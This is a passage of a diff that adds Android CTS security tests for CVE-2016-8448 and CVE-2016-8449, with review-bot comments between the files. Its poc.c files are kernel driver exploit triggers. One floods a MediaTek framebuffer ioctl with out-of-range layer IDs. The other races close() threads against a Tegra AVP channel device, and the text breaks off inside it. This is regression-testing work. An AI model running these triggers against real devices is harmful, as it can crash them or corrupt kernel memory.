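Review bot: The result of `open( "/dev/v4l-subdev17", 0x0ul )` is never checked, so on a device without that node `main` loops forever issuing ioctls on `fd == -1` and creating threads. Those threads are never joined or detached and `th[i]` is overwritten on every pass, so thread resources pile up until `pthread_create` fails, which is also unchecked. Add `if (fd < 0) return 0;` after the open and `pthread_join(th[i], NULL);` for both workers at the end of each pass of the `while(1)` loop. `ioctl` is called without `#include <sys/ioctl.h>`, and `pid`, `r[11]` and two of the four `th` slots are unused.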
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
new file mode 100644
index 0000000..cd6049f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8448
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
new file mode 100644
index 0000000..b33073c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
@@ -0,0 +1,397 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_H
+#define __MTKFB_H
+
+#include <linux/types.h>
+#include "mtkfb_info.h"
+
+
+/**NOTICE:
+ * Must be consistent with bionic/libc/kernel/linux/common/mtkfb.h
+ */
+#define MTK_FB_NO_ION_FD ((int)(~0U>>1))
+#define MTK_FB_NO_USE_LAEYR_ID ((int)(~0U>>1))
+#define FBCAPS_GENERIC_MASK (0x00000fff)
+#define FBCAPS_LCDC_MASK (0x00fff000)
+#define FBCAPS_PANEL_MASK (0xff000000)
+#define FBCAPS_MANUAL_UPDATE (0x00001000)
+#define FBCAPS_SET_BACKLIGHT (0x01000000)
+#define MTKFB_ERROR_IS_EARLY_SUSPEND (0x12000000)
+/* --------------------------------------------------------------------------- */
+/* IOCTL commands. */
+#define MTK_IOW(num, dtype) _IOW('O', num, dtype)
+#define MTK_IOR(num, dtype) _IOR('O', num, dtype)
+#define MTK_IOWR(num, dtype) _IOWR('O', num, dtype)
+#define MTK_IO(num) _IO('O', num)
+#define MTKFB_QUEUE_OVERLAY_CONFIG MTK_IOW(137, struct fb_overlay_config)
+/* -------------------------------------------------------------------------- */
+#define MTKFB_SET_OVERLAY_LAYER MTK_IOW(0, struct fb_overlay_layer)
+#define MTKFB_TRIG_OVERLAY_OUT MTK_IO(1)
+#define MTKFB_SET_VIDEO_LAYERS MTK_IOW(2, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_FRAMEBUFFER MTK_IOW(3, unsigned long)
+#define MTKFB_CONFIG_IMMEDIATE_UPDATE MTK_IOW(4, unsigned long)
+#define MTKFB_SET_MULTIPLE_LAYERS MTK_IOW(5, struct fb_overlay_layer)
+#define MTKFB_REGISTER_OVERLAYBUFFER MTK_IOW(6, struct fb_overlay_buffer_info)
+#define MTKFB_UNREGISTER_OVERLAYBUFFER MTK_IOW(7, unsigned int)
+#define MTKFB_SET_ORIENTATION MTK_IOW(8, unsigned long)
+#define MTKFB_FBLAYER_ENABLE MTK_IOW(9, unsigned int)
+#define MTKFB_LOCK_FRONT_BUFFER MTK_IO(10)
+#define MTKFB_UNLOCK_FRONT_BUFFER MTK_IO(11)
+#define MTKFB_POWERON MTK_IO(12)
+#define MTKFB_POWEROFF MTK_IO(13)
+
+/* Fence/Ion, OVL decoupling */
+#define MTKFB_PREPARE_OVERLAY_BUFFER MTK_IOW(14, struct fb_overlay_buffer)
+
+/* S3D control */
+#define MTKFB_SET_COMPOSING3D MTK_IOW(15, unsigned long)
+#define MTKFB_SET_S3D_FTM MTK_IOW(16, unsigned long)
+
+/* FM De-sense for EM and Normal mode */
+#define MTKFB_GET_DEFAULT_UPDATESPEED MTK_IOR(17, unsigned long)
+#define MTKFB_GET_CURR_UPDATESPEED MTK_IOR(18, unsigned long)
+/* for EM, not called change writecycle because DPI change pll ckl */
+#define MTKFB_CHANGE_UPDATESPEED MTK_IOW(19, unsigned long)
+#define MTKFB_GET_INTERFACE_TYPE MTK_IOR(20, unsigned long) /* /0 DBI, 1 DPI, 2 MIPI */
+#define MTKFB_GET_POWERSTATE MTK_IOR(21, unsigned long) /* /0: power off 1: power on */
+#define MTKFB_GET_DISPLAY_IF_INFORMATION MTK_IOR(22, mtk_dispif_info_t)
+/*called before SET_OVERLAY each time, if true, hwc will not use FB_LAYER again*/
+#define MTKFB_AEE_LAYER_EXIST MTK_IOR(23, unsigned long)
+#define MTKFB_GET_OVERLAY_LAYER_INFO MTK_IOR(24, struct fb_overlay_layer_info)
+#define MTKFB_FACTORY_AUTO_TEST MTK_IOR(25, unsigned long)
+#define MTKFB_GET_FRAMEBUFFER_MVA MTK_IOR(26, unsigned int)
+#define MTKFB_SLT_AUTO_CAPTURE MTK_IOWR(27, struct fb_slt_catpure)
+
+/*error handling*/
+#define MTKFB_META_RESTORE_SCREEN MTK_IOW(101, unsigned long)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT MTK_IO(103)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT_AEE MTK_IO(104)
+
+/*restore bootlogo and character in meta mode*/
+#define MTKFB_META_SHOW_BOOTLOGO MTK_IO(105)
+
+/*Extension FB active option*/
+#define FB_ACTIVATE_NO_UPDATE 512 /* Skip frame update */
+/**
+ * Just for mt6589 Platform
+ * @{
+ */
+#define MTKFB_GETVFRAMEPHYSICAL MTK_IOW(41, unsigned long)
+#define MTKFB_WAIT_OVERLAY_READY MTK_IO(42)
+#define MTKFB_GET_OVERLAY_LAYER_COUNT MTK_IOR(43, unsigned long)
+#define MTKFB_GET_VIDEOLAYER_SIZE MTK_IOR(44, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_VIDEOBUFFER MTK_IOW(45, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+/* Video Playback Mode */
+#define MTKFB_TV_POST_VIDEO_BUFFER MTK_IOW(46, unsigned long)
+#define MTKFB_TV_LEAVE_VIDEO_PLAYBACK_MODE MTK_IOW(47, unsigned long)
+/* For Factory Mode */
+#define MTKFB_IS_TV_CABLE_PLUG_IN MTK_IOW(48, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+#define MTKFB_BOOTANIMATION MTK_IO(49)
+#define MTKFB_GETFPS MTK_IOW(50, unsigned long)
+#define MTKFB_VSYNC MTK_IO(51)
+
+/* ----------------------------------------------------------------------FM De-sense for EM and Normal mode */
+#define MTKFB_FM_NOTIFY_FREQ MTK_IOW(52, unsigned long) /* for Normal mode */
+#define MTKFB_RESET_UPDATESPEED MTK_IO(53)
+#define MTKFB_SET_UI_LAYER_ALPHA MTK_IOW(54, unsigned long)
+#define MTKFB_SET_UI_LAYER_SRCKEY MTK_IOW(55, unsigned long)
+
+#define MTKFB_GET_MAX_DISPLAY_COUNT MTK_IOR(56, unsigned int)
+#define MTKFB_SET_FB_LAYER_SECURE MTK_IOW(57, int)
+/**
+ * @}
+ */
+/* ---------------------------------------------------------------------- */
+
+/* -------------------------------------------------------------------------- */
+
+typedef enum {
+ MTK_FB_ORIENTATION_0 = 0,
+ MTK_FB_ORIENTATION_90 = 1,
+ MTK_FB_ORIENTATION_180 = 2,
+ MTK_FB_ORIENTATION_270 = 3,
+} MTK_FB_ORIENTATION;
+
+
+typedef enum {
+ MTK_FB_TV_SYSTEM_NTSC = 0,
+ MTK_FB_TV_SYSTEM_PAL = 1,
+} MTK_FB_TV_SYSTEM;
+
+
+typedef enum {
+ MTK_FB_TV_FMT_RGB565 = 0,
+ MTK_FB_TV_FMT_YUV420_SEQ = 1,
+ MTK_FB_TV_FMT_UYUV422 = 2,
+ MTK_FB_TV_FMT_YUV420_BLK = 3,
+} MTK_FB_TV_SRC_FORMAT;
+
+typedef enum {
+ LAYER_NORMAL_BUFFER = 0,
+ LAYER_SECURE_BUFFER = 1,
+ LAYER_PROTECTED_BUFFER = 2,
+ LAYER_SECURE_BUFFER_WITH_ALIGN = 0x10001, /* the higher 16 bits =1 for adding 64 bytes alignment */
+} MTK_FB_OVL_LAYER_SECURE_MODE;
+
+typedef struct _disp_dfo_item {
+ char name[32];
+ int value;
+} disp_dfo_item_t;
+
+/* -------------------------------------------------------------------------- */
+struct fb_slt_catpure {
+ MTK_FB_FORMAT format;
+
+ volatile char *outputBuffer;
+ unsigned int wdma_width;
+ unsigned int wdma_height;
+};
+
+struct fb_scale {
+ unsigned int xscale, yscale;
+};
+
+struct fb_frame_offset {
+ unsigned int idx;
+ unsigned long offset;
+};
+
+struct fb_update_window {
+ unsigned int x, y;
+ unsigned int width, height;
+};
+
+typedef enum {
+ LAYER_2D = 0,
+ LAYER_3D_SBS_0 = 0x1,
+ LAYER_3D_SBS_90 = 0x2,
+ LAYER_3D_SBS_180 = 0x3,
+ LAYER_3D_SBS_270 = 0x4,
+ LAYER_3D_TAB_0 = 0x10,
+ LAYER_3D_TAB_90 = 0x20,
+ LAYER_3D_TAB_180 = 0x30,
+ LAYER_3D_TAB_270 = 0x40,
+} MTK_FB_LAYER_TYPE;
+
+typedef enum {
+ DISP_DIRECT_LINK_MODE,
+ DISP_DECOUPLE_MODE
+} MTK_DISP_MODE;
+struct fb_overlay_mode {
+ MTK_DISP_MODE mode;
+};
+
+typedef enum { /* map sessions to scenairos in kernel driver */
+ DISP_SESSION_LCM = 1 << 0, /* DSI0 */
+ DISP_SESSION_MEM = 1 << 1, /* OVL0->WDMA0 */
+/* Extension mode, Dst buf is provided by user,for Wifi Display or other purpose */
+ DISP_SESSION_WFD = 1 << 2,
+ DISP_SESSION_MHL = 1 << 3, /* DPI */
+ DISP_SESSION_LCM1 = 1 << 4, /* DSI1 */
+ DISP_SESSION_MEM1 = 1 << 5, /* OVL1->WDMA1 */
+ /* TODO:can be extended with other Session Id */
+ SESSION_MASK = 0xff & ~(1 << 6)
+} MTK_DISP_SESSION;
+
+struct fb_overlay_session {
+ unsigned int session; /* one or more @MTK_DISP_SESSION combined */
+};
+
+struct fb_overlay_decouple {
+ MTK_DISP_MODE mode;
+ unsigned int session;
+};
+struct fb_overlay_buffer {
+ /* Input */
+ int layer_id;
+ unsigned int layer_en;
+ int ion_fd;
+ unsigned int cache_sync;
+ /* Output */
+ unsigned int index;
+ int fence_fd;
+};
+
+struct fb_overlay_layer {
+ unsigned int layer_id;
+ unsigned int layer_enable;
+
+ void *src_base_addr;
+ void *src_phy_addr;
+ unsigned int src_direct_link;
+ MTK_FB_FORMAT src_fmt;
+ unsigned int src_use_color_key;
+ unsigned int src_color_key;
+ unsigned int src_pitch;
+ unsigned int src_offset_x, src_offset_y;
+ unsigned int src_width, src_height;
+
+ unsigned int tgt_offset_x, tgt_offset_y;
+ unsigned int tgt_width, tgt_height;
+ MTK_FB_ORIENTATION layer_rotation;
+ MTK_FB_LAYER_TYPE layer_type;
+ MTK_FB_ORIENTATION video_rotation;
+
+ unsigned int isTdshp; /* set to 1, will go through tdshp first, then layer blending, then to color */
+
+ int next_buff_idx;
+ int identity;
+ int connected_type;
+ unsigned int security;
+ unsigned int alpha_enable;
+ unsigned int alpha;
+ int fence_fd; /* 8135 */
+ int ion_fd; /* 8135 CL 2340210 */
+};
+
+struct fb_overlay_config {
+ int fence;
+ int time;
+ struct fb_overlay_layer layers[4];
+};
+
+struct fb_overlay_buffer_info {
+ unsigned int src_vir_addr;
+ unsigned int size;
+};
+
+struct fb_overlay_layer_info {
+ unsigned int layer_id;
+ unsigned int layer_enabled; /* TO BE DEL */
+ unsigned int curr_en;
+ unsigned int next_en;
+ unsigned int hw_en;
+ int curr_idx;
+ int next_idx;
+ int hw_idx;
+ int curr_identity;
+ int next_identity;
+ int hw_identity;
+ int curr_conn_type;
+ int next_conn_type;
+ int hw_conn_type;
+ MTK_FB_ORIENTATION layer_rotation;
+};
+/* -------------------------------------------------------------------------- */
+
+struct fb_post_video_buffer {
+ void *phy_addr;
+ void *vir_addr;
+ MTK_FB_TV_SRC_FORMAT format;
+ unsigned int width, height;
+};
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern unsigned int EnableVSyncLog;
+
+void mtkfb_log_enable(int enable);
+int mtkfb_set_backlight_mode(unsigned int mode);
+int mtkfb_set_backlight_level(unsigned int level);
+int mtkfb_get_debug_state(char *stringbuf, int buf_len);
+unsigned int mtkfb_fm_auto_test(void);
+void mtkfb_clear_lcm(void);
+#endif /* CONFIG_ARCH_MT6735 */
+
+#ifdef __KERNEL__
+
+#include <linux/completion.h>
+#include <linux/interrupt.h>
+#include <linux/workqueue.h>
+#include <linux/version.h>
+#include <../drivers/staging/android/sw_sync.h>
+
+
+#define MTKFB_DRIVER "mtkfb"
+
+enum mtkfb_state {
+ MTKFB_DISABLED = 0,
+ MTKFB_SUSPENDED = 99,
+ MTKFB_ACTIVE = 100
+};
+
+typedef enum {
+ MTKFB_LAYER_ENABLE_DIRTY = (1 << 0),
+ MTKFB_LAYER_FORMAT_DIRTY = (1 << 1),
+ MTKFB_LAYER_SET_DIRTY = (1 << 2),
+} MTKFB_LAYER_CONFIG_DIRTY;
+
+typedef struct {
+ struct work_struct work;
+ struct list_head list;
+ struct fb_overlay_config config;
+ struct sync_fence *fences[4];
+ struct ion_handle *ion_handles[4];
+ void *dev;
+} update_ovls_work_t;
+
+struct mtkfb_device {
+ int state;
+ void *fb_va_base; /* MPU virtual address */
+ dma_addr_t fb_pa_base; /* Bus physical address */
+ unsigned long fb_size_in_byte;
+ void *ovl_va_base; /* MPU virtual address */
+ dma_addr_t ovl_pa_base; /* Bus physical address */
+ unsigned long ovl_size_in_byte;
+
+ unsigned long layer_enable;
+ MTK_FB_FORMAT *layer_format;
+ unsigned int layer_config_dirty;
+
+ int xscale, yscale, mirror; /* transformations.
+ rotate is stored in fb_info->var */
+ u32 pseudo_palette[17];
+
+ struct fb_info *fb_info; /* Linux fbdev framework data */
+ struct device *dev;
+
+ /* Android native fence support */
+ struct workqueue_struct *update_ovls_wq;
+ struct mutex timeline_lock;
+ struct sw_sync_timeline *timeline;
+ int timeline_max;
+ struct list_head pending_configs; /* CL2340210 */
+ struct ion_client *ion_client;
+};
+
+#endif /* __KERNEL__ */
+
+extern long hdmi_handle_cmd(unsigned int cmd, unsigned long arg);
+
+#if defined(CONFIG_ARCH_MT6797)
+extern unsigned int vramsize;
+#endif
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern bool is_early_suspended;
+extern void mtkfb_waitVsync(void);
+extern bool is_ipoh_bootup;
+
+#ifdef CONFIG_OF
+int _parse_tag_videolfb(void);
+extern unsigned int islcmconnected;
+extern unsigned int vramsize;
+#else
+extern char *saved_command_line;
+#endif
+#endif /* CONFIG_ARCH_MT6735 */
+
+
+#endif /* __MTKFB_H */
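Review bot: `struct fb_overlay_layer` contains `void *src_base_addr` and `void *src_phy_addr`, and `MTKFB_QUEUE_OVERLAY_CONFIG` encodes the size of `struct fb_overlay_config` through `MTK_IOW`, so the 32-bit and 64-bit binaries produced by `LOCAL_MULTILIB := both` in this directory's `Android.mk` get different structure layouts and different request numbers. Whether the driver accepts both forms is not visible here, so one of the two variants may exercise nothing and still look like a pass. I would add a comment at the top of the header stating which kernel tree and word size this copy was taken from, next to the existing "Must be consistent with bionic/libc/kernel/linux/common/mtkfb.h" notice. The `#ifdef __KERNEL__` block and the `extern` declarations after it are unused in a userspace test and could be dropped from this copy.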
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
new file mode 100644
index 0000000..61e7cfd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
@@ -0,0 +1,101 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_INFO_H__
+#define __MTKFB_INFO_H__
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+
+ typedef enum {
+ DISPIF_TYPE_DBI = 0,
+ DISPIF_TYPE_DPI,
+ DISPIF_TYPE_DSI,
+ DISPIF_TYPE_DPI0,
+ DISPIF_TYPE_DPI1,
+ DISPIF_TYPE_DSI0,
+ DISPIF_TYPE_DSI1,
+ HDMI = 7,
+ HDMI_SMARTBOOK,
+ MHL,
+ DISPIF_TYPE_EPD,
+ SLIMPORT
+ } MTKFB_DISPIF_TYPE;
+
+ typedef enum {
+ MTKFB_DISPIF_PRIMARY_LCD = 0,
+ MTKFB_DISPIF_HDMI,
+ MTKFB_DISPIF_EPD,
+ MTKFB_MAX_DISPLAY_COUNT
+ } MTKFB_DISPIF_DEVICE_TYPE;
+
+ typedef enum {
+ DISPIF_FORMAT_RGB565 = 0,
+ DISPIF_FORMAT_RGB666,
+ DISPIF_FORMAT_RGB888
+ } MTKFB_DISPIF_FORMAT;
+
+
+ typedef enum {
+ DISPIF_MODE_VIDEO = 0,
+ DISPIF_MODE_COMMAND
+ } MTKFB_DISPIF_MODE;
+
+ typedef struct mtk_dispif_info {
+ unsigned int display_id;
+ unsigned int isHwVsyncAvailable;
+ MTKFB_DISPIF_TYPE displayType;
+ unsigned int displayWidth;
+ unsigned int displayHeight;
+ unsigned int displayFormat;
+ MTKFB_DISPIF_MODE displayMode;
+ unsigned int vsyncFPS;
+ unsigned int physicalWidth;
+ unsigned int physicalHeight;
+ unsigned int isConnected;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Wdith */
+ unsigned int lcmOriginalWidth;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Height */
+ unsigned int lcmOriginalHeight;
+ } mtk_dispif_info_t;
+
+#define MAKE_MTK_FB_FORMAT_ID(id, bpp) (((id) << 8) | (bpp))
+
+ typedef enum {
+ MTK_FB_FORMAT_UNKNOWN = 0,
+
+ MTK_FB_FORMAT_RGB565 = MAKE_MTK_FB_FORMAT_ID(1, 2),
+ MTK_FB_FORMAT_RGB888 = MAKE_MTK_FB_FORMAT_ID(2, 3),
+ MTK_FB_FORMAT_BGR888 = MAKE_MTK_FB_FORMAT_ID(3, 3),
+ MTK_FB_FORMAT_ARGB8888 = MAKE_MTK_FB_FORMAT_ID(4, 4),
+ MTK_FB_FORMAT_ABGR8888 = MAKE_MTK_FB_FORMAT_ID(5, 4),
+ MTK_FB_FORMAT_YUV422 = MAKE_MTK_FB_FORMAT_ID(6, 2),
+ MTK_FB_FORMAT_XRGB8888 = MAKE_MTK_FB_FORMAT_ID(7, 4),
+ MTK_FB_FORMAT_XBGR8888 = MAKE_MTK_FB_FORMAT_ID(8, 4),
+ MTK_FB_FORMAT_UYVY = MAKE_MTK_FB_FORMAT_ID(9, 2),
+ MTK_FB_FORMAT_YUV420_P = MAKE_MTK_FB_FORMAT_ID(10, 2),
+ MTK_FB_FORMAT_YUY2 = MAKE_MTK_FB_FORMAT_ID(11, 2),
+ MTK_FB_FORMAT_BPP_MASK = 0xFF,
+ } MTK_FB_FORMAT;
+
+#define GET_MTK_FB_FORMAT_BPP(f) ((f) & MTK_FB_FORMAT_BPP_MASK)
+
+
+#ifdef __cplusplus
+}
+#endif
+#endif /* __DISP_DRV_H__ */
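Review bot: The closing `#endif /* __DISP_DRV_H__ */` names a different guard than the one this header opens with, `__MTKFB_INFO_H__`; the comment should read `#endif /* __MTKFB_INFO_H__ */`. The two comments above `lcmOriginalWidth` and `lcmOriginalHeight` also spell "Width" as "Wdith" in the first one. If the file is meant to stay identical to an upstream driver header (not visible from this hunk), say so in the header comment and leave both as they are.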
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
new file mode 100644
index 0000000..e5f675b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <sys/mman.h>
+#include <fcntl.h>
+//#include <pthread.h>
+#include <sys/prctl.h>
+#include <unistd.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <asm-generic/ioctl.h>
+#include "mtkfb.h"
+int main(int argc, char **argv) {
+ int fd = 0;
+ struct fb_overlay_layer layerInfo;
+ memset(&layerInfo, 0, sizeof(layerInfo));
+ fd = open("/dev/graphics/fb0", O_RDWR);
+ if (fd < 0) {
+ perror("open /dev/graphics/fb0");
+ exit(-1);
+ }
+ printf("Device file opened successfully\n");
+ printf("Trying to get layer info\n");
+ if(ioctl(fd, MTKFB_GET_OVERLAY_LAYER_INFO, &layerInfo) == -1) {
+ perror("ioctl MTKFB_GET_OVERLAY_LAYER_INFO failed");
+ exit(-2);
+ }
+ printf("Got layer info\n");
+ printf("Trying to set layer info\n");
+ // set any huge value here
+ int curr_val = 0xf1111111;
+ while(1) {
+ layerInfo.layer_id = curr_val;
+ if(ioctl(fd, MTKFB_SET_OVERLAY_LAYER, &layerInfo) == -1) {
+ perror("ioctl MTKFB_SET_OVERLAY_LAYER failed");
+ //exit(-2);
+ }
+ curr_val--;
+ if(curr_val == -1) {
+ break;
+ }
+ }
+ printf("Set layer info\n");
+ return 0;
+}
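Review bot: `curr_val` in `main` is a signed `int` initialised from `0xf1111111`, which does not fit in `int` and ends up negative, so `curr_val--` can only reach the `-1` exit condition by decrementing past `INT_MIN`, which is undefined behaviour for a signed type. Declaring it `unsigned int curr_val = 0xf1111111u;` and testing `if (curr_val == 0xffffffffu)` walks the same bit patterns with defined wrap-around. Even then the loop issues on the order of four billion ioctl calls, so a bounded iteration count would give the CTS run a predictable duration. `ioctl()` is also called with only `<asm-generic/ioctl.h>` included in this file; unless `mtkfb.h` pulls in `<sys/ioctl.h>`, the prototype is missing, and `fd` is never closed on the normal exit path.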
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
new file mode 100644
index 0000000..ce1e1bb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8449
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
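Review bot: The warning and hardening flags are appended to plain `CFLAGS` and `LDFLAGS`, which are global make variables rather than module variables; as far as I know the Android.mk build only consumes the `LOCAL_`-prefixed ones, so `-Wall`, `-D_FORTIFY_SOURCE=2` and `-fPIE` most likely never reach `poc.c`, while the unprefixed variables keep accumulating across every Android.mk that is parsed. Use `LOCAL_CFLAGS += ...` and `LOCAL_LDFLAGS += -rdynamic`, and express `-Iinclude` as `LOCAL_C_INCLUDES := $(LOCAL_PATH)/include` if that directory exists. The same lines appear in the Android.mk files added for CVE-2016-8460 (there starting with `CFLAGS :=`), CVE-2016-8482, CVE-2016-9120 and CVE-2017-0403 in this commit.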
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
new file mode 100755
index 0000000..1e76b55
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
@@ -0,0 +1,143 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/tegra_avpchannel"
+
+#define NVAVP_IOCTL_MAGIC 'n'
+
+struct nvavp_channel_open_args {
+ __u32 channel_fd;
+};
+
+#define NVAVP_IOCTL_CHANNEL_OPEN _IOR(NVAVP_IOCTL_MAGIC, 0x73, \
+ struct nvavp_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ ERR("[-] set affinity failed");
+ }
+ return ret;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvavp_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV, O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ LOG("[+] open OK");
+ }
+
+ #if 1
